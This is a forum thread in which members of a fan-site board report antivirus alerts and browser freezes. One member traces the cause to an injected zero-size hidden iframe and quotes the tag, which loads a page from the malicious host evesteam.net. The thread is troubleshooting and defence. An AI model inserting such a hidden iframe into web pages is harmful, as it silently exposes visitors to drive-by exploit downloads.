Webshield alert!! Toontastic is a danger to your computer.

Park Life

• Replies 85
  • Created
  • Last Reply

Top Posters In This Topic

Yep, me as well. At home and at work.

Web Shield Alert

File name : evesteam.net/dl/un/index.php

Threat: Exploit Sploit25 obfuscation

Edited by JawD

"When I go on there I see my browser loading something from evesteam.net, which Symantec tells me has threats on it: https://safeweb.norton.com/report/show?name=evesteam.net

Just then when I was on the forum index, Firefox told me I was missing Quicktime to display the page properly, then when I clicked on a forum I got some address at evestream.net and Adobe Acrobat Reader started up. Firefox then froze." [Dave/]

Yep - I've seen the thread over at N-O too....

Not experienced it myself but there's enough of you reporting stuff to know it's not isolated. My initial instincts are that it's something to do with the server - going to need to run this one past Pud I'm afraid...

Yep - I've seen the thread over at N-O too....

Not experienced it myself but there's enough of you reporting stuff to know it's not isolated. My initial instincts are that it's something to do with the server - going to need to run this one past Pud I'm afraid...

Reaction time 48hrs. :lol:

hmmm I'm not at a usable machine so can't do anything myself, no files have been amended or anything in the recent past. As soon as I get home il check although if craig can check FTP to see what the date is on the index file on server it would be a help

hmmm I'm not at a usable machine so can't do anything myself, no files have been amended or anything in the recent past. As soon as I get home il check although if craig can check FTP to see what the date is on the index file on server it would be a help

I reckon Craig had knacked it. :lol:

Can I suggest the those who have the issue please report what you are running? Might help narrow down the issue. For example:

OS/Browser/Antivirus -

Win Vista, Safari 3.2.1, NOD32 AV

Park Life, are you using a mac? Safari on the PC works fine for me.

Can I suggest the those who have the issue please report what you are running? Might help narrow down the issue. For example:

OS/Browser/Antivirus -

Win Vista, Safari 3.2.1, NOD32 AV

Park Life, are you using a mac? Safari on the PC works fine for me.

Good idea.

Safari works fine but a bit slower.

Problem is on:

PC/Vista/AVG/Firefox

Infact couple of times FF just told me to close the page. Bit scary as a lot of my work stuff is on the laptop. :lol::suicide:

possibly related but does anyone else get a 404 error below the footer? It's just appeared on my iPhone in last half hour

I've a couple of those today on Safari but I normally get that cause of the shit cable (chewed on) I thought.

It's probably from an advert the board has (i block ad's so i don't know if there is any mind)

but the page in question evesteam.net/dl/un/index.php doesn't exist anyways so that's where your 404 is coming from

We dont run adverts, its an ad free zone. :lol:

yeah i'm right

you've an iframe loading on pages

<iframe src="http://evesteam.net/dl/un/index.php" frameborder=0 width=0 height=0></iframe>

just need to upgrade your Invision board or apply the patch i guess there was one released about 6-7months ago for 2.3.5 and under

and code for loading the iframe is probably held in the script/page containing the footer info for the copyright and all that shite

Ant the meister hacker crosses over?